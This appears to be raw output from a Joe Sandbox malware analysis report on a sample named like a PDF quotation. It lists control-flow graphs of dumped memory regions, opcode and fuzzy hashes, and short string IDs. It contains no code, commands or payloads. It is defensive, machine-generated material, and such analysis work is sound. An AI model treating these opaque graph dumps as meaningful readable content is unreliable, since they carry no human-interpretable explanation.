                                                    control_flow_graph 747 5c00040-5c00066 748 5c00077-5c00080 747->748 749 5c00068-5c00075 747->749 749->748 750 5c00083-5c00090 749->750 751 5c00092-5c00099 750->751 752 5c0009b 750->752 753 5c000a2-5c000cc 751->753 752->753 754 5c000d5-5c000e8 753->754 755 5c000ce 753->755 757 5c0022c-5c00233 754->757 758 5c000ee-5c00101 754->758 755->754 759 5c00239-5c0024e 757->759 760 5c004cd-5c004d4 757->760 768 5c00103-5c0010a 758->768 769 5c0010f-5c00129 758->769 773 5c00250-5c00252 759->773 774 5c0026e-5c00274 759->774 761 5c00543-5c0054a 760->761 762 5c004d6-5c004df 760->762 764 5c00550-5c00559 761->764 765 5c005e6-5c005ed 761->765 762->761 767 5c004e1-5c004f4 762->767 764->765 770 5c0055f-5c00572 764->770 771 5c00609-5c0060f 765->771 772 5c005ef-5c00600 765->772 767->761 788 5c004f6-5c0053b 767->788 775 5c00225 768->775 783 5c00130-5c0013d 769->783 784 5c0012b-5c0012e 769->784 794 5c00574-5c00583 770->794 795 5c00585-5c00589 770->795 778 5c00621-5c0062a 771->778 779 5c00611-5c00617 771->779 772->771 796 5c00602 772->796 773->774 776 5c00254-5c0026b 773->776 780 5c0027a-5c0027c 774->780 781 5c0033c-5c00340 774->781 775->757 776->774 789 5c00619-5c0061f 779->789 790 5c0062d-5c006a2 779->790 780->781 791 5c00282-5c0028d call 5c007bf 780->791 781->760 785 5c00346-5c00348 781->785 792 5c0013f-5c00153 783->792 784->792 785->760 793 5c0034e-5c00357 785->793 788->761 824 5c0053d-5c00540 788->824 789->778 789->790 856 5c006b0 790->856 857 5c006a4-5c006ae 790->857 798 5c00293-5c00303 791->798 792->775 823 5c00159-5c001ad 792->823 801 5c004aa-5c004b0 793->801 794->795 802 5c005a9-5c005ab 795->802 803 5c0058b-5c0058d 795->803 796->771 852 5c00305-5c00317 798->852 853 5c0031a-5c00339 798->853 806 5c004b2-5c004c1 801->806 807 5c004c3 801->807 802->765 805 5c005ad-5c005b3 802->805 803->802 810 5c0058f-5c005a6 803->810 805->765 811 5c005b5-5c005e3 805->811 814 5c004c5-5c004c7 806->814 807->814 810->802 811->765 814->760 816 5c0035c-5c0036a 814->816 829 5c00382-5c0039c 816->829 830 5c0036c-5c00372 816->830 859 5c001bb-5c001bf 823->859 860 5c001af-5c001b1 823->860 824->761 829->801 838 5c003a2-5c003a6 829->838 832 5c00374 830->832 833 5c00376-5c00378 830->833 832->829 833->829 839 5c003c7 838->839 840 5c003a8-5c003b1 838->840 846 5c003ca-5c003e4 839->846 844 5c003b3-5c003b6 840->844 845 5c003b8-5c003bb 840->845 848 5c003c5 844->848 845->848 846->801 865 5c003ea-5c0046b 846->865 848->846 852->853 853->781 863 5c006b5-5c006b7 856->863 857->863 859->775 864 5c001c1-5c001d9 859->864 860->859 866 5c006b9-5c006bc 863->866 867 5c006be-5c006c3 863->867 864->775 871 5c001db-5c001e7 864->871 887 5c00482-5c004a8 865->887 888 5c0046d-5c0047f 865->888 868 5c006c9-5c006f6 866->868 867->868 874 5c001f6-5c001fc 871->874 875 5c001e9-5c001ec 871->875 876 5c00204-5c0020d 874->876 877 5c001fe-5c00201 874->877 875->874 878 5c0021c-5c00222 876->878 879 5c0020f-5c00212 876->879 877->876 878->775 879->878 887->760 887->801 888->887
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $0q$$0q
                                                    • API String ID: 0-2062176166
                                                    • Opcode ID: f2ef95ee64b2c208c50d3ae7bbe1b8af77592d2bdd837aa55c90a4ecf2eeed06
                                                    • Instruction ID: c58a496ed2fe301db1759060bc865cbe5735a566a846c70c4d841d5dd17a7015
                                                    • Opcode Fuzzy Hash: f2ef95ee64b2c208c50d3ae7bbe1b8af77592d2bdd837aa55c90a4ecf2eeed06
                                                    • Instruction Fuzzy Hash: 60226A74A042198FCB15CFA5D858BBEBBB6FF48304F559459E801A7290DB34AE42CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 892 59a0078-59a0084 893 59a009c-59a009e 892->893 894 59a0086-59a008c 892->894 897 59a04b5-59a04c1 893->897 895 59a008e 894->895 896 59a0090-59a009a 894->896 895->893 896->893 900 59a00a3-59a00a6 897->900 901 59a04c7-59a04c9 897->901 902 59a0149-59a014c 900->902 903 59a00ac-59a00ae 900->903 904 59a04cb-59a04d9 901->904 905 59a04e1-59a04e7 901->905 906 59a01f2-59a01f5 902->906 907 59a0152-59a0154 902->907 908 59a00ff-59a0101 903->908 909 59a00b0-59a00c0 903->909 904->905 910 59a04eb-59a04f7 905->910 911 59a04e9 905->911 912 59a029b-59a029e 906->912 913 59a01fb-59a01fd 906->913 914 59a0156-59a0166 907->914 915 59a01a5-59a01a7 907->915 916 59a011b-59a0120 908->916 917 59a0103-59a0109 908->917 909->908 918 59a00c2-59a00e5 909->918 920 59a04f9-59a04ff 910->920 911->920 929 59a0344-59a0347 912->929 930 59a02a4-59a02a6 912->930 921 59a024e-59a0250 913->921 922 59a01ff-59a020f 913->922 914->915 925 59a0168-59a018b 914->925 923 59a01a9-59a01af 915->923 924 59a01c1-59a01c6 915->924 1044 59a0122 call 5c0d440 916->1044 1045 59a0122 call 5c0d450 916->1045 1046 59a0122 call 5c0d718 916->1046 927 59a010b 917->927 928 59a010d-59a0119 917->928 998 59a00fd 918->998 999 59a00e7-59a00ed 918->999 931 59a026a-59a027c 921->931 932 59a0252-59a0258 921->932 922->921 940 59a0211-59a0234 922->940 933 59a01b3-59a01bf 923->933 934 59a01b1 923->934 1047 59a01cb call 5c0d440 924->1047 1048 59a01cb call 5c0d450 924->1048 1049 59a01cb call 5c0d718 924->1049 1016 59a018d-59a0193 925->1016 1017 59a01a3 925->1017 927->916 928->916 935 59a03ed-59a03f0 929->935 936 59a034d-59a034f 929->936 938 59a02a8-59a02b8 930->938 939 59a02f7-59a02f9 930->939 975 59a027e-59a0284 931->975 976 59a0294-59a0296 931->976 942 59a025a 932->942 943 59a025c-59a0268 932->943 933->924 934->924 944 59a0493-59a0495 935->944 945 59a03f6-59a03f8 935->945 948 59a03a0-59a03a2 936->948 949 59a0351-59a0361 936->949 937 59a0128-59a012a 950 59a012c-59a0132 937->950 951 59a0142-59a0144 937->951 938->939 952 59a02ba-59a02dd 938->952 954 59a02fb-59a0301 939->954 955 59a0313-59a0325 939->955 1024 59a024c 940->1024 1025 59a0236-59a023c 940->1025 942->931 943->931 956 59a04ad 944->956 957 59a0497-59a04a5 944->957 960 59a03fa-59a040a 945->960 961 59a0449-59a044b 945->961 946 59a01d1-59a01d3 962 59a01eb-59a01ed 946->962 963 59a01d5-59a01db 946->963 968 59a03bc-59a03ce 948->968 969 59a03a4-59a03aa 948->969 949->948 964 59a0363-59a0386 949->964 965 59a0136-59a0138 950->965 966 59a0134 950->966 951->897 1029 59a02df-59a02e5 952->1029 1030 59a02f5 952->1030 971 59a0303 954->971 972 59a0305-59a0311 954->972 988 59a033d-59a033f 955->988 989 59a0327-59a032d 955->989 956->897 957->956 960->961 977 59a040c-59a042f 960->977 981 59a044d-59a0453 961->981 982 59a0465-59a0477 961->982 962->897 978 59a01df-59a01e1 963->978 979 59a01dd 963->979 1034 59a0388-59a038e 964->1034 1035 59a039e 964->1035 965->951 966->951 1000 59a03d0-59a03d6 968->1000 1001 59a03e6-59a03e8 968->1001 984 59a03ae-59a03ba 969->984 985 59a03ac 969->985 971->955 972->955 991 59a0288-59a028a 975->991 992 59a0286 975->992 976->897 1038 59a0431-59a0437 977->1038 1039 59a0447 977->1039 978->962 979->962 995 59a0457-59a0463 981->995 996 59a0455 981->996 1018 59a0479-59a047f 982->1018 1019 59a048f-59a0491 982->1019 984->968 985->968 988->897 1002 59a032f 989->1002 1003 59a0331-59a0333 989->1003 991->976 992->976 995->982 996->982 998->908 1009 59a00ef 999->1009 1010 59a00f1-59a00f3 999->1010 1011 59a03da-59a03dc 1000->1011 1012 59a03d8 1000->1012 1001->897 1002->988 1003->988 1009->998 1010->998 1011->1001 1012->1001 1026 59a0197-59a0199 1016->1026 1027 59a0195 1016->1027 1017->915 1020 59a0483-59a0485 1018->1020 1021 59a0481 1018->1021 1019->897 1020->1019 1021->1019 1024->921 1031 59a023e 1025->1031 1032 59a0240-59a0242 1025->1032 1026->1017 1027->1017 1036 59a02e9-59a02eb 1029->1036 1037 59a02e7 1029->1037 1030->939 1031->1024 1032->1024 1040 59a0392-59a0394 1034->1040 1041 59a0390 1034->1041 1035->948 1036->1030 1037->1030 1042 59a043b-59a043d 1038->1042 1043 59a0439 1038->1043 1039->961 1040->1035 1041->1035 1042->1039 1043->1039 1044->937 1045->937 1046->937 1047->946 1048->946 1049->946
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383858801.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_59a0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q$4'0q
                                                    • API String ID: 0-2150913031
                                                    • Opcode ID: 6b349f91ec40aef30ae52fb86782f0855661a537e26f5f2fb4801a98632cbc4c
                                                    • Instruction ID: 5931c9dabab420ef4c76b634af9efb99391b2f4a450d378b21ed1b16f2c4c5eb
                                                    • Opcode Fuzzy Hash: 6b349f91ec40aef30ae52fb86782f0855661a537e26f5f2fb4801a98632cbc4c
                                                    • Instruction Fuzzy Hash: 01B17632B152128BCF36596A856D73A69DBBFC5A50B54443ED90ACB244EF718C43C3F2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1050 5c02f28-5c02f3a 1051 5c02f64-5c02f68 1050->1051 1052 5c02f3c-5c02f5d 1050->1052 1053 5c02f74-5c02f83 1051->1053 1054 5c02f6a-5c02f6c 1051->1054 1052->1051 1055 5c02f85 1053->1055 1056 5c02f8f-5c02fbb 1053->1056 1054->1053 1055->1056 1060 5c02fc1-5c02fc7 1056->1060 1061 5c031e8-5c031fc 1056->1061 1062 5c03099-5c0309d 1060->1062 1063 5c02fcd-5c02fd3 1060->1063 1069 5c031cc-5c031d6 1061->1069 1070 5c031fe-5c0322f 1061->1070 1065 5c030c0-5c030c9 1062->1065 1066 5c0309f-5c030a8 1062->1066 1063->1061 1067 5c02fd9-5c02fe6 1063->1067 1074 5c030cb-5c030eb 1065->1074 1075 5c030ee-5c030f1 1065->1075 1066->1061 1071 5c030ae-5c030be 1066->1071 1072 5c03078-5c03081 1067->1072 1073 5c02fec-5c02ff5 1067->1073 1081 5c031de-5c031e5 1069->1081 1096 5c03231 1070->1096 1097 5c03245-5c03251 1070->1097 1076 5c030f4-5c030fa 1071->1076 1072->1061 1077 5c03087-5c03093 1072->1077 1073->1061 1078 5c02ffb-5c03013 1073->1078 1074->1075 1075->1076 1076->1061 1080 5c03100-5c03113 1076->1080 1077->1062 1077->1063 1082 5c03015 1078->1082 1083 5c0301f-5c03031 1078->1083 1080->1061 1085 5c03119-5c03129 1080->1085 1082->1083 1083->1072 1090 5c03033-5c03039 1083->1090 1085->1061 1089 5c0312f-5c0313c 1085->1089 1089->1061 1091 5c03142-5c03157 1089->1091 1092 5c03045-5c0304b 1090->1092 1093 5c0303b 1090->1093 1091->1061 1100 5c0315d-5c03180 1091->1100 1092->1061 1095 5c03051-5c03075 1092->1095 1093->1092 1099 5c03234-5c03236 1096->1099 1101 5c03253 1097->1101 1102 5c0325d-5c03279 1097->1102 1104 5c03238-5c03243 1099->1104 1105 5c0327a-5c032a7 1099->1105 1100->1061 1109 5c03182-5c0318d 1100->1109 1101->1102 1104->1097 1104->1099 1114 5c032a9-5c032af 1105->1114 1115 5c032bf-5c032c1 1105->1115 1109->1081 1111 5c0318f-5c03199 1109->1111 1111->1081 1116 5c0319b-5c031b1 1111->1116 1117 5c032b1 1114->1117 1118 5c032b3-5c032b5 1114->1118 1136 5c032c3 call 5c03340 1115->1136 1137 5c032c3 call 5c03330 1115->1137 1138 5c032c3 call 5c044df 1115->1138 1123 5c031b3 1116->1123 1124 5c031bd-5c031c6 1116->1124 1117->1115 1118->1115 1119 5c032c9-5c032cd 1121 5c03318-5c03328 1119->1121 1122 5c032cf-5c032e6 1119->1122 1122->1121 1129 5c032e8-5c032f2 1122->1129 1123->1124 1124->1069 1131 5c032f4-5c03303 1129->1131 1132 5c03305-5c03315 1129->1132 1131->1132 1136->1119 1137->1119 1138->1119
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (4q$d
                                                    • API String ID: 0-685716487
                                                    • Opcode ID: 637ad4175c573ac24800267e843a38542b02e36814147f0877bb13934a9bea89
                                                    • Instruction ID: 10f85539c91fbbed5e05830c2df64a8524b512a725f8d89e86afcc1fd6421173
                                                    • Opcode Fuzzy Hash: 637ad4175c573ac24800267e843a38542b02e36814147f0877bb13934a9bea89
                                                    • Instruction Fuzzy Hash: 50D185346006069FCB24DF28C58496ABBF2FF89710B258969D45A9B3A1DB31FD46CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1139 5c01c28-5c01c60 1141 5c01c66-5c01c6a 1139->1141 1142 5c01d4c-5c01d71 1139->1142 1143 5c01c6c-5c01c78 1141->1143 1144 5c01c7e-5c01c82 1141->1144 1149 5c01d78-5c01d9c 1142->1149 1143->1144 1143->1149 1145 5c01da3-5c01dc8 1144->1145 1146 5c01c88-5c01c9f 1144->1146 1166 5c01dcf-5c01e09 1145->1166 1157 5c01ca1-5c01cad 1146->1157 1158 5c01cb3-5c01cb7 1146->1158 1149->1145 1157->1158 1157->1166 1160 5c01ce3-5c01cfc 1158->1160 1161 5c01cb9-5c01cd2 1158->1161 1172 5c01d25-5c01d3a 1160->1172 1173 5c01cfe-5c01d22 1160->1173 1161->1160 1171 5c01cd4-5c01cd7 1161->1171 1181 5c01e0b-5c01e22 1166->1181 1182 5c01e3d-5c01e44 1166->1182 1175 5c01ce0 1171->1175 1179 5c01d45-5c01d49 1172->1179 1175->1160 1183 5c01e24-5c01e3a 1181->1183 1184 5c01e5a-5c01e7f 1181->1184 1187 5c01e86-5c01eb9 1182->1187 1188 5c01e46-5c01e57 1182->1188 1183->1182 1184->1187 1198 5c01ebb-5c01ec1 1187->1198 1199 5c01eed-5c01ef4 1187->1199 1200 5c01ef5 1198->1200 1201 5c01ec3-5c01eda 1198->1201 1199->1200 1202 5c01ee0-5c01eec 1201->1202 1203 5c01f81-5c01fb1 1201->1203 1206 5c01ef6-5c01f0a 1202->1206 1207 5c01eee-5c01ef4 1202->1207 1215 5c01fb3-5c01fb9 1203->1215 1216 5c01fe5-5c01fec 1203->1216 1210 5c01f79-5c01f80 1206->1210 1211 5c01f0c-5c01f31 1206->1211 1207->1200 1226 5c01f33-5c01f4d 1211->1226 1227 5c01f74-5c01f77 1211->1227 1217 5c01fbb-5c01fcf 1215->1217 1218 5c01fed-5c01ff5 1215->1218 1216->1218 1220 5c01fd1-5c01fe1 1217->1220 1221 5c01fff-5c02005 1217->1221 1218->1221 1222 5c01ff7 1218->1222 1220->1216 1223 5c02017-5c02026 1221->1223 1224 5c02007-5c02014 1221->1224 1222->1221 1226->1227 1229 5c01f4f-5c01f58 1226->1229 1227->1210 1227->1211 1230 5c01f67-5c01f73 1229->1230 1231 5c01f5a-5c01f5d 1229->1231 1231->1230
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (4q$(4q
                                                    • API String ID: 0-375554967
                                                    • Opcode ID: 6c2ea88ded3ecec5ee39012a3dabee2fc73dec28c3eae9e535d7152534124ba9
                                                    • Instruction ID: f6e4980e4006ae9abe7be2f9c18e922717632223fe66559f0c4c63e22059bffb
                                                    • Opcode Fuzzy Hash: 6c2ea88ded3ecec5ee39012a3dabee2fc73dec28c3eae9e535d7152534124ba9
                                                    • Instruction Fuzzy Hash: 5151E1363142458FCB16DF28D858AAE7BE2FF84314B14856AE805CB3E5CB36DD16CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1232 59a06e8-59a06f3 1233 59a070b-59a070d 1232->1233 1234 59a06f5-59a06fb 1232->1234 1237 59a0867-59a0872 1233->1237 1235 59a06ff-59a0709 1234->1235 1236 59a06fd 1234->1236 1235->1233 1236->1233 1240 59a0878-59a087a 1237->1240 1241 59a0712-59a0715 1237->1241 1244 59a087c-59a088a 1240->1244 1245 59a0891-59a0897 1240->1245 1242 59a0742-59a0745 1241->1242 1243 59a0717-59a0719 1241->1243 1248 59a0780-59a0783 1242->1248 1249 59a0747-59a0749 1242->1249 1246 59a071b-59a0729 1243->1246 1247 59a0730-59a073d 1243->1247 1244->1245 1250 59a089b-59a08a7 1245->1250 1251 59a0899 1245->1251 1246->1247 1247->1237 1253 59a07b0-59a07b3 1248->1253 1254 59a0785-59a0787 1248->1254 1256 59a074b-59a0759 1249->1256 1257 59a0760-59a0763 1249->1257 1252 59a08a9-59a08ae 1250->1252 1251->1252 1258 59a07de-59a07e1 1253->1258 1259 59a07b5-59a07b7 1253->1259 1262 59a0789-59a0797 1254->1262 1263 59a079e-59a07ab 1254->1263 1256->1257 1297 59a0765 call 5c0e0f7 1257->1297 1298 59a0765 call 5c0e108 1257->1298 1299 59a0765 call 5c0e2a8 1257->1299 1269 59a0812-59a0815 1258->1269 1270 59a07e3-59a07e5 1258->1270 1266 59a07b9-59a07c7 1259->1266 1267 59a07ce-59a07d9 1259->1267 1262->1263 1263->1237 1266->1267 1267->1237 1268 59a076b-59a076d 1268->1237 1272 59a0773-59a077b 1268->1272 1273 59a0846-59a0848 1269->1273 1274 59a0817-59a0819 1269->1274 1275 59a07fc 1270->1275 1276 59a07e7-59a07f5 1270->1276 1272->1237 1278 59a084a-59a0858 1273->1278 1279 59a085f 1273->1279 1281 59a081b-59a0829 1274->1281 1282 59a0830-59a083a 1274->1282 1294 59a07fe call 5c0e0f7 1275->1294 1295 59a07fe call 5c0e108 1275->1295 1296 59a07fe call 5c0e2a8 1275->1296 1276->1275 1278->1279 1279->1237 1281->1282 1282->1237 1291 59a083c-59a0844 1282->1291 1284 59a0804-59a0806 1284->1237 1287 59a0808-59a0810 1284->1287 1287->1237 1291->1237 1294->1284 1295->1284 1296->1284 1297->1268 1298->1268 1299->1268
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383858801.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_59a0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q$4'0q
                                                    • API String ID: 0-2150913031
                                                    • Opcode ID: 0da7b789ca0061725aa36471c4a54c9bedc1423224f06bf5877dc25d00a69503
                                                    • Instruction ID: 813b83850c59c9ef74f69f5c901e2c5f103a2c1bf3689e67b9b14869bbd72a38
                                                    • Opcode Fuzzy Hash: 0da7b789ca0061725aa36471c4a54c9bedc1423224f06bf5877dc25d00a69503
                                                    • Instruction Fuzzy Hash: 4941B136B262114B4B3BA62E00AC53F25DBBFD55507494D2EC84BD7384DF7A8C02A7E6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1300 5c0bd08-5c0bd13 1301 5c0bd21 1300->1301 1302 5c0bd15-5c0bd1f 1300->1302 1303 5c0bd26-5c0bd28 1301->1303 1302->1303 1304 5c0bd56-5c0bdcb 1303->1304 1305 5c0bd2a-5c0bd3d call 5c04d38 call 5c08a18 1303->1305 1319 5c0bdd0-5c0bdd8 1304->1319 1340 5c0bd3f call 5c0bd98 1305->1340 1341 5c0bd3f call 5c0bd08 1305->1341 1342 5c0bd3f call 5c0bcf8 1305->1342 1312 5c0bd45-5c0bd53 call 5c084e0 1320 5c0bdda-5c0bdf4 1319->1320 1321 5c0be2c-5c0be6c 1319->1321 1326 5c0be26-5c0be2a 1320->1326 1327 5c0bdf6-5c0be04 1320->1327 1332 5c0be73-5c0bea3 call 5c0bd08 1321->1332 1326->1320 1326->1321 1327->1326 1331 5c0be06-5c0be0a 1327->1331 1331->1332 1333 5c0be0c-5c0be1a 1331->1333 1333->1326 1337 5c0be1c-5c0be25 1333->1337 1340->1312 1341->1312 1342->1312
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (4q$H4q
                                                    • API String ID: 0-513182925
                                                    • Opcode ID: a516560cc5d23e061610828253af2ebfca5353d14e8cfb247cdd8afa5ee503dd
                                                    • Instruction ID: d95d4fc274f81b2bdb3e91f3896b01caa745ab77e3c2e02a00ffcbf6f0dae782
                                                    • Opcode Fuzzy Hash: a516560cc5d23e061610828253af2ebfca5353d14e8cfb247cdd8afa5ee503dd
                                                    • Instruction Fuzzy Hash: 9751F0357106108FCB05DB2CC964A2E7BF2FF86214B1584AAE205DB3E5DB39DD06CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1343 59a0520-59a052b 1344 59a052d-59a0533 1343->1344 1345 59a0543-59a0545 1343->1345 1346 59a0537-59a0541 1344->1346 1347 59a0535 1344->1347 1348 59a067c-59a0687 1345->1348 1346->1345 1347->1345 1351 59a054a-59a054d 1348->1351 1352 59a068d-59a068f 1348->1352 1353 59a05a8-59a05ab 1351->1353 1354 59a054f-59a0551 1351->1354 1355 59a0691-59a069f 1352->1355 1356 59a06a7-59a06ad 1352->1356 1359 59a05ad-59a05af 1353->1359 1360 59a0603-59a0606 1353->1360 1361 59a0569-59a056f 1354->1361 1362 59a0553-59a0561 1354->1362 1355->1356 1357 59a06af 1356->1357 1358 59a06b1-59a06bd 1356->1358 1364 59a06bf-59a06c4 1357->1364 1358->1364 1365 59a05b1-59a05bf 1359->1365 1366 59a05c7-59a05d9 1359->1366 1367 59a065a-59a065c 1360->1367 1368 59a0608-59a060a 1360->1368 1399 59a0574 call 5c0d440 1361->1399 1400 59a0574 call 5c0d450 1361->1400 1401 59a0574 call 5c0d718 1361->1401 1362->1361 1365->1366 1381 59a05db-59a05e1 1366->1381 1382 59a05f1-59a05f3 1366->1382 1369 59a065e-59a066c 1367->1369 1370 59a0674 1367->1370 1371 59a060c-59a061a 1368->1371 1372 59a0622-59a0634 1368->1372 1369->1370 1370->1348 1371->1372 1388 59a064c-59a064e 1372->1388 1389 59a0636-59a063c 1372->1389 1375 59a0579-59a057b 1377 59a057d-59a0583 1375->1377 1378 59a0593-59a0595 1375->1378 1383 59a0587-59a0589 1377->1383 1384 59a0585 1377->1384 1378->1348 1385 59a059b-59a05a3 1378->1385 1390 59a05e3 1381->1390 1391 59a05e5-59a05e7 1381->1391 1382->1348 1392 59a05f9-59a0601 1382->1392 1383->1378 1384->1378 1385->1348 1388->1348 1395 59a0650-59a0658 1388->1395 1393 59a063e 1389->1393 1394 59a0640-59a0642 1389->1394 1390->1382 1391->1382 1392->1348 1393->1388 1394->1388 1395->1348 1399->1375 1400->1375 1401->1375
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383858801.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_59a0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q$4'0q
                                                    • API String ID: 0-2150913031
                                                    • Opcode ID: 264877478b8b3243b6c3b1c2b1c2ba751066b307bde35d6d3c8318bd6bd91ab0
                                                    • Instruction ID: af49607c40be726f5b9e1156c9ce62988d61d810cd1b3fb999beee351a2733fd
                                                    • Opcode Fuzzy Hash: 264877478b8b3243b6c3b1c2b1c2ba751066b307bde35d6d3c8318bd6bd91ab0
                                                    • Instruction Fuzzy Hash: 3341C732B152128BCB36A66B852D77A25DBBFC5654B14462EC906CB384DF71CC02C3F2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1402 5c06400-5c0644e 1404 5c06450-5c06459 1402->1404 1405 5c0645f-5c0647a 1402->1405 1404->1405 1406 5c06480-5c0649a call 5c02108 1405->1406 1407 5c0699a-5c069a7 1405->1407 1412 5c064a0-5c064b1 1406->1412 1413 5c06866-5c068c2 1406->1413 1409 5c069b2-5c069fc 1407->1409 1410 5c069a9-5c069af 1407->1410 1536 5c069ff call 5c07331 1409->1536 1537 5c069ff call 5c072dd 1409->1537 1410->1409 1415 5c064b3-5c064c4 1412->1415 1416 5c064d5-5c06509 1412->1416 1427 5c068cd-5c068ff 1413->1427 1414 5c06a05-5c06a09 1417 5c0690a-5c0695f 1414->1417 1418 5c06a0f-5c06a19 1414->1418 1415->1416 1429 5c064c6-5c064cf 1415->1429 1431 5c0652a-5c065da 1416->1431 1432 5c0650b-5c0651e call 5c01ec8 1416->1432 1459 5c0696a 1417->1459 1420 5c06c0e-5c06c4d 1418->1420 1421 5c06a1f-5c06a31 1418->1421 1445 5c06c54-5c06c5a 1420->1445 1421->1420 1425 5c06a37-5c06a3f 1421->1425 1426 5c06a45-5c06ac7 1425->1426 1425->1427 1469 5c06dc3-5c06dcd 1426->1469 1470 5c06acd-5c06add 1426->1470 1427->1417 1429->1416 1483 5c065e0-5c065e7 1431->1483 1484 5c06829-5c0685b 1431->1484 1432->1431 1451 5c06c62-5c06caf 1445->1451 1454 5c06cb1-5c06d11 1451->1454 1455 5c06d13-5c06d5a 1451->1455 1456 5c06d60-5c06dbe 1454->1456 1455->1456 1464 5c06bcc-5c06bef 1456->1464 1465 5c0696f-5c0698b 1459->1465 1479 5c06bf5-5c06c09 1464->1479 1480 5c06768-5c0676f 1464->1480 1465->1407 1469->1464 1471 5c06dd3-5c06de3 1469->1471 1470->1445 1472 5c06ae3-5c06af6 1470->1472 1471->1464 1474 5c06de9-5c06df3 1471->1474 1481 5c06b01-5c06b16 1472->1481 1482 5c06af8-5c06afe 1472->1482 1474->1464 1478 5c06df9-5c06e1c 1474->1478 1478->1464 1479->1480 1485 5c067f1-5c06807 1480->1485 1486 5c06775-5c0678a 1480->1486 1481->1451 1496 5c06b1c-5c06bca 1481->1496 1482->1481 1483->1459 1488 5c065ed-5c0668e 1483->1488 1484->1413 1489 5c06e64-5c06e77 1485->1489 1498 5c06790-5c067ae call 5c0787a 1486->1498 1499 5c06e21-5c06e36 1486->1499 1488->1465 1525 5c06694-5c06766 1488->1525 1504 5c06e78 1489->1504 1496->1464 1512 5c067b4-5c067c0 1498->1512 1508 5c0680c-5c06821 1499->1508 1509 5c06e3c-5c06e5d 1499->1509 1504->1504 1508->1484 1509->1489 1515 5c067c2-5c067cc 1512->1515 1516 5c067ce-5c067ef 1512->1516 1515->1485 1515->1516 1516->1485 1525->1480 1536->1414 1537->1414
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,4q
                                                    • API String ID: 0-2140648754
                                                    • Opcode ID: c08cdab8cc10dd94f4670f3f8f68fc0d4e73bc94de28d1ad21e3a9dd4f411b27
                                                    • Instruction ID: 052dcd6b7f2636c02cf11b148bbc411ba84bf77e6ef65e36ab894f88e81c0d1e
                                                    • Opcode Fuzzy Hash: c08cdab8cc10dd94f4670f3f8f68fc0d4e73bc94de28d1ad21e3a9dd4f411b27
                                                    • Instruction Fuzzy Hash: EB521B75A102298FCB24CF69C941BDDBBF6BF88300F1584E9E509A7391DA309E81CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
